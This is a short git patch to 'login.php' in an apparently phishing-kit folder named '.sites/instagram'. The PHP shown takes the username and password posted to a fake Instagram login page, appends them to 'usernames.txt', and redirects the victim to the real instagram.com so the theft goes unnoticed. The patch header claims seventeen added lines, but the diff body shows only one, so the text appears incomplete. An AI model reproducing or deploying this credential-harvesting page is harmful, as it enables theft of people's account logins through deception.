From 20e89884df047c29acd6ddf3b0c88ffbc51b84d7 Mon Sep 17 00:00:00 2001 From: 56-sys Date: Tue, 21 Jan 2025 10:47:23 -0400 Subject: [PATCH] Update login.php --- .sites/instagram/login.php | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/.sites/instagram/login.php b/.sites/instagram/login.php index b7a4f4ef..b950ee6d 100644 --- a/.sites/instagram/login.php +++ b/.sites/instagram/login.php @@ -1,6 +1,22 @@ file_put_contents("usernames.txt", "Instagram Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); header('Location: https://instagram.com'); exit(); -?> \ No newline at end of file +?>